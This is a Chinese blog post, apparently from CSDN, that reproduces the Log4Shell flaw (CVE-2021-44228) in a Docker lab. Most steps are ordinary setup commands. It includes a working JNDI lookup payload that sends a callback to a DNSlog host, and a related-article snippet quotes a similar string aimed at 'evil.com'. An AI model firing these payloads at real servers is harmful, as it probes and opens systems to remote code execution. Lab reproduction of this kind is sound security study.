CVE-2021-44228 Apache Log4j 远程代码执行漏洞复现

最新推荐文章于 2024-05-29 12:38:45 发布
最新推荐文章于 2024-05-29 12:38:45 发布
阅读量414 收藏 1
点赞数
文章标签: apache 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/principle1/article/details/122065981
版权

(影响版本Apache Log4j 2.0.x~2.14.1)

CVE-2021-44228 Apache Log4j 远程代码执行漏洞复现

(影响版本Apache Log4j 2.0.x~2.14.1)

1.安装docker

 

2.使用docker下载Log4j2的镜像环境

docker pull vulfocus/log4j2-rce-2021-12-09

 

3.使用docker为该漏洞环境开启一个容器,并以交互式模式在后台运行

docker run -it -d -p 1234:8080 vulfocus/log4j2-rce-2021-12-09

-i:以交互模式运行容器,通常与 -t 同时使用;

-d:后台运行容器;

-p:端口映射,主机(宿主)端口:容器端口。

docker exec -it d3614f134add bash

(在运行的容器中执行命令)

从上面可以看出系统执行了demo.jar这个jar包,这个jar包是存在Log4j 远程代码执行漏洞

4.在主机访问(http://127.0.0.1:1234

并没有得到什么有用的信息,可以使用目录扫描试一下

把扫出来的目录尝试访问,发现/hello目录存在不一样的返回界面

该页面不支持get请求,可以尝试post请求

 

在这里随便post参数都能返回ok,但是只有payload参数是我们可以进行命令执行的(别问我为什么,我也不知道)

5.执行攻击payload,可以在dnslog看到回显

payload=${jndi:ladp://king.m5gwx8.dnslog.cn/exp}

 

点击Execute后,可以在Dnslog平台上看到回显

(dnslog平台上不一定能看到回显,多换几个域名试一下)

principle1
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Apache Log4j 远程代码执行漏洞(CVE-2021-44832)
10-25
然而,2021 年底,Log4j 发现了一个严重的安全漏洞,被称为 CVE-2021-44228(也称为 Log4Shell),这使得攻击者可以通过在日志记录中注入恶意代码远程执行任意代码,从而对受影响的系统造成严重威胁。 此漏洞源于...
复现CVE-2021-44228-Apache Log4j2远程代码执行漏洞
Jietewang的博客
12-19 9012
复现CVE-2021-44228-Apache Log4j2远程代码执行漏洞 目录 前言 漏洞原理 影响范围 环境搭建&漏洞复现 使用工具JNDIExploit-1.2-SNAPSHOT.jar 前言 近期Apache Log4j2被暴露了一个严重的远程代码执行安全漏洞CVE-2021-44228),有严重的安全风险。Apache Log4j2是一款优秀的Java日志框架, 被广泛地应用在中间件、开发框架与Web应用中。2021年11月24日,阿里云安全团队向apache官方.
CVE-2021-44228 Log4j 复现及原理
weixin_45260839的博客
05-08 2055
CVE-2021-44228 Log4j 复现及原理
CVE-2021-44228漏洞复现
最新发布
m0_65764670的博客
05-29 1270
漏洞log4j2漏洞log4j2是java语言的日志处理套件,使用很广泛。在2.0到2.14.1版本中存在JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似'${jndi:ldap://evil.com/example}'​的参数进行JNDI注入,执行任意代码(注:Java环境1.8也可能会存在)什么是JNDI?
Log4j2远程代码执行漏洞复现(cve-2021-44228)
热门推荐
weixin_47179815的博客
07-12 1万+
Log4j2远程代码执行漏洞(cve-2021-44228)复现笔记内容Apache log4jApache的一个开源项目,Apache log4j 2是一个就Java的日志记录工具。通过重写了log4j框架,并且引入了大量丰富的特性,可以控制日志信息输送的目的地为控制台、文件、GUI组建等,被应用于业务系统开发,用于记录程序输入输出日志信息。log4j2中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞。成功利用该漏洞可在目标服务器上执行任意代码。JNDI简单介绍JNDI(Java Na
log4j2漏洞CVE-2021-44228复现笔记(纯步骤过程,没有复杂的知识点)
qq_41132792的博客
05-24 5373
纯粹的一个过程复现,小白向,没有复杂的讲解,按照步骤一步步来就可以成功复现了。
Apache Log4j2远程代码执行漏洞CVE-2021-44228复现
qq_40640917的博客
01-10 2476
Apache Log4j2 存在远程代码执行漏洞,该漏洞是由于Apache Log4j2某些功能存在递归解析功能,未经身份验证的攻击者通过发送特定恶意数据包,可在目标服务器上执行任意代码Apache Log4j2是一个开源的Java日志框架,被广泛地应用在中间件、开发框架与Web应用中。攻击机参数:Kali(或安装有msfconsole的任意Linux/Windows操作系统)靶机容器:vulfocus/log4j2-rce-2021-12-09。靶机参数:Centos8.1。
Apache Log4j2 远程代码执行漏洞检测工具
12-15
然而,在2021年12月初,一个严重的安全漏洞CVE-2021-44228)被公开,这个漏洞被称为"Log4Shell",允许攻击者通过注入恶意的JNDI(Java Naming and Directory Interface)链接来执行远程代码,对受影响的系统造成...
CVE-2021-25646-Apache Druid漏洞POC.py
02-26
CVE-2021-25646-Apache Druid漏洞POC.py
CVE-2021-44228log4j2漏洞复现
fainpo的博客
05-07 280
漏洞适用版本:2.0 <= Apache log4j2 <= 2.14.1。
log4j2远程代码执行漏洞复现CVE-2021-44228
Wshchf的博客
06-04 635
Apache log4j2—RCE 漏洞是由于Log4j2 提供的lookup功能下的jndi Lookup模块出现问题所导致的,该功能模块在输出日志信息时允许开发人员通过相应的协议去请求远程主机上的资源。而开发人员在处理数据时,并没有对用户输入的数据进行判断,导致Log4j2 请求远程主机上含有恶意代码的资源并执行其中的代码,从而造成远程代码执行漏洞log4j2框架下的lookup查询服务提供了{}字段解析功能,传进去的值会被直接解析。例如${java:version}会被替换为对应的java版本。
Log4j2远程命令执行CVE-2021-44228
weixin_48817799的博客
01-25 1075
Log4j2远程命令执行CVE-2021-44228) 前言一、vulfocus靶场二、复现步骤1.靶场如下2.点击抓包 前言 Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。 在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。攻击者利用此特性可通过该漏洞构造特殊的数据请求包,最终触发远程代码执行。 一、vulfocus靶场 http://vulfocus.io.
Log4j2远程代码执行漏洞CVE-2021-44228
wangzhifei1的博客
01-16 2082
CVE-2021-44228,被广泛称为“Log4Shell”,是一个高危的远程代码执行漏洞,影响了Apache Log4j 2,这是一个在Java应用程序中广泛使用的日志记录库。
Apache Log4j2漏洞 (CVE-2021-44228) 分析与复现
未完成的歌~的博客
03-15 6653
Apache Log4j2 是一个开源的 Java 日志记录工具。Log4j2 是 Log4j 的升级版本,其优异的性能被广泛的应用于各种常见的 Web 服务中。Log4j2 在特定的版本中由于启用了 lookup 功能,导致存在 JNDI 漏洞。lookup 函数是用于在日志消息中替换变量的函数,是通过配置文件中的${}语法调用的,例如:如果在日志消息中使用了,那么 log4j2 将使用 lookup 函数从系统属性中查找名为 “my.property” 的属性值,并将其替换为实际值。
漏洞复现——log4j2-rce(CVE-2021-44228
小林说安全的博客
05-29 1997
漏洞复现——log4j2-rce(CVE-2021-44228
【vulhub】Log4j2:CVE-2021-44228漏洞复现
weixin_49422491的博客
09-13 2775
【vulhub】Log4j2:CVE-2021-44228漏洞复现
Apache Log4j远程代码执行漏洞CVE-2021-44228)临时防护
03-07
答:针对Apache Log4j远程代码执行漏洞CVE-2021-44228),可以采取以下临时防护措施:1.升级Log4j版本至2.15.或以上;2.禁用Log4j JNDI功能;3.在防火墙上禁止外部访问Log4j JNDI服务;4.在应用程序中禁用Log4j JNDI功能。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值